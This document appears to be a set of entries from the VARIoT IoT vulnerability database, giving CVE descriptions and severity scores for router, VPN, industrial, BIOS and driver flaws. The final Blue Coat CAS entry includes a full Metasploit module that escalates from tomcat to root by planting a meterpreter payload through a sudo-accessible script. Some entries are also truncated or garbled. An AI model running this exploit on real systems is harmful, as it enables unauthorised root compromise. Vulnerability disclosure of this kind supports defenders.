VARIoT IoT vulnerabilities database


VAR-201705-1348 CVE-2016-8497 Fortinet FortiClient SSL_VPN for Linux (used with FortiOS) privilege escalation vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: Critical
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none. Fortinet FortiClient SSL_VPN for Linux, used with FortiOS, contains a vulnerability that allows elevation of privilege: an attacker may gain root privileges via the subproc file. FortiClient SSLVPN is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to gain root privileges. FortiClient SSLVPN for Linux available with FortiOS prior to 5.4.3 is vulnerable
VAR-201705-1347 CVE-2016-8496 Fortinet FortiClient SSLVPN CVE-2016-8496 Remote Code Execution Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none. Fortinet FortiClient SSLVPN is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the affected application. Failed attempts may lead to denial-of-service conditions. Versions of FortiClient SSLVPN prior to those shipped with FortiOS 5.4.3 are vulnerable. Fortinet FortiClient SSL_VPN for Linux is a Linux-based VPN client from Fortinet for connecting to Fortinet devices. A security vulnerability exists in Fortinet FortiClient SSL_VPN for Linux. An attacker could use the FortiClient log file to exploit this vulnerability and overwrite arbitrary files
VAR-201704-0602 CVE-2017-5135 Technicolor DPC3928SL firmware access control vulnerability CVSS V2: 6.4
CVSS V3: 9.1
Severity: CRITICAL
Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability. The Technicolor (formerly Cisco) DPC3928SL firmware contains an access control vulnerability. In addition, the GitHub repository string-bleed/StringBleed-CVE-2017-5135 is not valid as of 2017-04-27 and may contain Trojan code that purports to exploit this vulnerability. Information may be obtained and altered. Technicolor DPC3928SL is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Technicolor DPC3928SL is a cable modem from the French Technicolor Group. A remote attacker could exploit this vulnerability to bypass access controls and execute code
VAR-201706-0364 CVE-2016-9358 Multiple Marel Food Processing Systems products: use of hard-coded credentials in product firmware CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A Hard-Coded Passwords issue was discovered in Marel Food Processing Systems M3000 terminal associated with the following systems: A320, A325, A371, A520 Master, A520 Slave, A530, A542, A571, Check Bin Grader, FlowlineQC T376, IPM3 Dual Cam v132, IPM3 Dual Cam v139, IPM3 Single Cam v132, P520, P574, SensorX13 QC flow line, SensorX23 QC Master, SensorX23 QC Slave, Speed Batcher, T374, T377, V36, V36B, and V36C; M3210 terminal associated with the same systems as the M3000 terminal identified above; M3000 desktop software associated with the same systems as the M3000 terminal identified above; MAC4 controller associated with the same systems as the M3000 terminal identified above; SensorX23 X-ray machine; SensorX25 X-ray machine; and MWS2 weighing system. The end user does not have the ability to change system passwords. The firmware of multiple Marel Food Processing Systems products contains a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). The Marel SensorX25 X-ray Machine and the other affected products are products of Iceland's Marel for the medical industry that provide various medical tests. A security bypass vulnerability exists in several Marel products, originating from the programs' use of hard-coded credentials. A remote attacker could exploit the vulnerability to gain unauthorized access to the affected device. Marel Food Processing Systems are prone to the following security vulnerabilities: 1. A security-bypass vulnerability. 2. An arbitrary file-upload vulnerability. Marel SensorX25 X-ray Machine, etc
VAR-201706-0465 CVE-2017-6041 Multiple Marel Food Processing Systems products: unrestricted upload of dangerous file types in product firmware CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An Unrestricted Upload issue was discovered in Marel Food Processing Systems M3000 terminal associated with the following systems: A320, A325, A371, A520 Master, A520 Slave, A530, A542, A571, Check Bin Grader, FlowlineQC T376, IPM3 Dual Cam v132, IPM3 Dual Cam v139, IPM3 Single Cam v132, P520, P574, SensorX13 QC flow line, SensorX23 QC Master, SensorX23 QC Slave, Speed Batcher, T374, T377, V36, V36B, and V36C; M3210 terminal associated with the same systems as the M3000 terminal identified above; M3000 desktop software associated with the same systems as the M3000 terminal identified above; MAC4 controller associated with the same systems as the M3000 terminal identified above; SensorX23 X-ray machine; SensorX25 X-ray machine; and MWS2 weighing system. This vulnerability allows an attacker to modify the operation and upload firmware changes without detection. The firmware of multiple Marel Food Processing Systems products contains a vulnerability related to the unrestricted upload of dangerous file types. Information may be obtained or altered, and service operation may be disrupted (DoS). The Marel SensorX25 X-ray Machine and the other affected products are products of Iceland's Marel for the medical industry that provide various medical tests. Several Marel Food Processing Systems products contain arbitrary file upload vulnerabilities. Marel Food Processing Systems are prone to the following security vulnerabilities: 1. A security-bypass vulnerability. 2. Marel SensorX25 X-ray Machine, etc
VAR-201704-1487 CVE-2017-7398 D-Link DIR-615 T1 Cross-site request forgery vulnerability in some firmware

Related entries in the VARIoT exploits database: VAR-E-201704-0206
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
D-Link DIR-615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated, as demonstrated by changing the Security option from WPA2 to None, or changing the hiddenSSID parameter, SSID parameter, or a security-option password. D-Link DIR-615 T1 contains a cross-site request forgery vulnerability. An attack may obtain information, alter information, or disrupt service operation (DoS). D-Link DIR-615 is a wireless router product from D-Link. A remote attacker could send a specially crafted request to exploit this vulnerability and change the administrator password and network policy
VAR-201704-0977 CVE-2016-9219 Cisco Wireless LAN Controller software input validation vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability with IPv6 UDP ingress packet processing in Cisco Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to cause an unexpected reload of the device. The vulnerability is due to incomplete IPv6 UDP header validation. An attacker could exploit this vulnerability by sending a crafted IPv6 UDP packet to a specific port on the targeted device. An exploit could allow the attacker to impact the availability of the device as it could unexpectedly reload. This vulnerability affects Cisco Wireless LAN Controller (WLC) running software version 8.2.121.0 or 8.3.102.0. Cisco Bug IDs: CSCva98592. The vendor has confirmed this vulnerability and published it as Bug ID CSCva98592. A denial-of-service (DoS) attack may be carried out. The Cisco WLC is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. Attackers can exploit this issue to cause denial-of-service conditions
VAR-201704-0721 CVE-2017-2387 Apple Music application for Android server spoofing vulnerability CVSS V2: 2.9
CVSS V3: 4.8
Severity: MEDIUM
The Apple Music (aka com.apple.android.music) application before 2.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. Apple Music for Android is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Versions prior to Apple Music 2.0 running on Android version 4.3 and later are vulnerable. The vulnerability stems from the fact that the program does not verify the X.509 certificate of the SSL server.
Impact: An attacker who can perform a man-in-the-middle attack may present bogus SSL certificates which the application will accept silently.
Timeline:
August 5, 2016 - Notified Apple via product-security@apple.com
August 5, 2016 - Apple sent an auto acknowledgment
August 16, 2016 - Apple responded stating that they are investigating
October 5, 2016 - Apple confirmed the vulnerability
January 18, 2017 - Asked for a status update
January 20, 2017 - Apple responded stating that they are still working on the issue
April 4, 2017 - Apple released version 2.0.0 which resolves this vulnerability
Solution: Upgrade to version 2.0.0 or later. https://support.apple.com/en-us/HT207605 https://support.apple.com/en-us/HT201222
CVE-ID: CVE-2017-2387. This issue was addressed through improved certificate validation. CVE-2017-2387: David Coomber of Info-Sec.CA
Installation note: Apple Music 2.0 for Android may be obtained from Google Play.
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
VAR-201704-0654 CVE-2017-5683 Intel Hardware Accelerated Execution Manager IntelHAXM.sys driver privilege escalation vulnerability CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
Privilege escalation in IntelHAXM.sys driver in the Intel Hardware Accelerated Execution Manager before version 6.0.6 allows a local user to gain system level access. Local attackers can exploit this issue to gain system level access
VAR-201704-0569 CVE-2017-3125 FortiMail Unspecified cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
An unauthenticated XSS vulnerability with FortiMail 5.0.0 - 5.2.9 and 5.3.0 - 5.3.8 could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in to FortiMail, assuming the victim is social engineered into clicking a URL crafted by the attacker. Fortinet FortiMail is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiMail 5.0.0 through 5.2.9 and 5.3.0 through 5.3.8 are vulnerable. Fortinet FortiMail is an email information security device from Fortinet, which provides an information filtering engine, anti-spam and threat defense functions
VAR-201704-0631 CVE-2017-0329 NVIDIA boot and power management processor driver authorization and access control vulnerability CVSS V2: 7.6
CVSS V3: 7.0
Severity: HIGH
An elevation of privilege vulnerability in the NVIDIA boot and power management processor driver could enable a local malicious application to execute arbitrary code within the context of the boot and power management processor. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel 3.18. Android ID: A-34115304. References: N-CVE-2017-0329. This vulnerability is published as Android ID A-34115304 and NVIDIA N-CVE-2017-0329. An attack may obtain information, alter information, or disrupt service operation (DoS). Google Pixel C is a tablet; the NVIDIA GPU driver is one of the NVIDIA graphics processor driver components used in it. Google Pixel C has a privilege escalation vulnerability that an attacker can exploit to elevate privileges. Google Pixel C is prone to a privilege-escalation vulnerability. Attackers can exploit this issue to execute arbitrary code with elevated privileges within the context of the process. This issue is being tracked by Android Bug ID A-34115304
VAR-201704-0655 CVE-2017-5684 Intel Compute Stick system BIOS information access vulnerability CVSS V2: 2.1
CVSS V3: 3.9
Severity: LOW
The BIOS in Intel Compute Stick systems based on 6th Gen Intel Core processors prior to version CC047 may allow an attacker with physical access to the system to gain access to personal information. Intel NUC is Intel's micro PC, which is equivalent to a small desktop, allowing you to work, study and play in any room. A local information disclosure vulnerability exists in Intel NUC and Compute Stick DCI. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is the basic input/output system
VAR-201704-0656 CVE-2017-5685 Intel NUC system BIOS information access vulnerability CVSS V2: 2.1
CVSS V3: 3.9
Severity: LOW
The BIOS in Intel NUC systems based on 6th Gen Intel Core processors prior to version KY0045 may allow an attacker with physical access to the system to gain access to personal information. Intel NUC is Intel's micro PC, which is equivalent to a small desktop, allowing you to work, study and play in any room. A local information disclosure vulnerability exists in Intel NUC and Compute Stick DCI. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is the basic input/output system
VAR-201704-0657 CVE-2017-5686 Intel NUC system BIOS information access vulnerability CVSS V2: 2.1
CVSS V3: 3.9
Severity: LOW
The BIOS in Intel NUC systems based on 6th Gen Intel Core processors prior to version SY0059 may allow an attacker with physical access to the system to gain access to personal information. Intel NUC is a micro PC from Intel Corporation. Intel NUC has a local information disclosure vulnerability. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is the basic input/output system
VAR-201704-0067 CVE-2016-10312 Multiple Jensen of Scandinavia AS Air:Link devices arbitrary command execution vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to execute arbitrary commands via shell metacharacters to certain /goform/* pages. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are all routers of the Norwegian company Jensen of Scandinavia AS. A number of /goform/* pages on Jensen of Scandinavia Air:Link products have command execution vulnerabilities. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev
VAR-201704-0068 CVE-2016-10313 Multiple Jensen of Scandinavia AS Air:Link devices cross-site request forgery vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct CSRF attacks via certain /goform/* pages. The Jensen of Scandinavia AS Air:Link 3G (AL3G), Air:Link 5000AC (AL5000AC) and Air:Link 59300 (AL59300) devices contain a cross-site request forgery vulnerability. A remote attacker may perform a cross-site request forgery attack via the /goform/* pages. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are all routers of the Norwegian company Jensen of Scandinavia AS. The vulnerability allows remote attackers to build malicious URIs, entice users to open them, and perform malicious actions in the context of the target user. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev
VAR-201704-0069 CVE-2016-10314 Multiple Jensen of Scandinavia AS Air:Link devices password read vulnerability CVSS V2: 4.0
CVSS V3: 8.8
Severity: HIGH
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to read passwords via a direct request to the x.asp page. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are all routers of the Norwegian company Jensen of Scandinavia AS. A number of Jensen of Scandinavia Air:Link products have information disclosure vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev
VAR-201704-0070 CVE-2016-10315 Multiple Jensen of Scandinavia AS Air:Link devices open redirect vulnerability CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the submit-url parameter to certain /goform/* pages. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are all routers of the Norwegian company Jensen of Scandinavia AS. An attacker can construct a malicious URI, entice the user to open it, and redirect the user to an arbitrary web site for phishing attacks. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev
VAR-201704-0071 CVE-2016-10316 Multiple Jensen of Scandinavia AS Air:Link devices open redirect vulnerability CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are all routers of the Norwegian company Jensen of Scandinavia AS. An attacker can construct a malicious URI, entice the user to open it, and redirect the user to an arbitrary web site for phishing attacks. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev
VAR-201704-0485 CVE-2016-9091 Blue Coat Advanced Secure Gateway and Content Analysis System OS command injection vulnerability CVSS V2: 9.0
CVSS V3: 7.2
Severity: HIGH
Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. Blue Coat Advanced Secure Gateway (ASG) and Content Analysis System (CAS) are products of Blue Coat Systems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Blue Coat products are prone to a command-injection vulnerability because they fail to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable.
# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091
Timeline:
--------
08/31/2016 (Vulnerabilities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)
Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerability. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. 
Proof of Concept: Metasploit Module - root priv escalation (via mvtroubleshooting.sh) ----------------- ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class Metasploit4 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::Local::Linux def initialize(info={}) super( update_info( info, { 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', 'Description' => %q{ This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate privileges. In order to work, a tomcat session with access to sudo on the sudoers is needed. This module is useful for post exploitation of BlueCoat vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute sudo on the sudoers file. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Hebert <chrisdhebert[at]gmail.com>', 'Pete Paccione <petepaccione[at]gmail.com>', 'Corey Boyd <corey.k.boyd[at]gmail.com>' ], 'DisclosureDate' => 'Vendor Contacted 8-31-2016', 'References' => [ ['EDB', '##TBD##'], ['CVE', '2016-9091' ], ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] ], 'Platform' => %w{ linux unix }, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ] ], 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, 'DefaultTarget' => 0, } )) register_options([ OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), ], self.class) end def check id=cmd_exec("id -un") if id!="tomcat" print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") end clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3") if clprelease!="1.3.7.1" print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1") fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1") end return Exploit::CheckCode::Vulnerable end def exploit print_status("#{peer} - Checking for vulnerable BlueCoat session...") if check != CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") end print_status("#{peer} - Running Exploit...") exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" write_file(exe_file, generate_payload_exe) cmd_exec "chmod +x #{exe_file}" begin #Backup original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$ #Replaces /etc/init.d/nscd script with meterpreter payload cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh 
#{exe_file} /data/bluecoat/avenger/ui/logs/troubles$ #Executes meterpreter payload as root cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh" #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1) ensure #Restores original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$ #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it) cmd_exec "/bin/rm -f #{exe_file}" end print_status("#{peer} - The exploit module has finished") #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. end end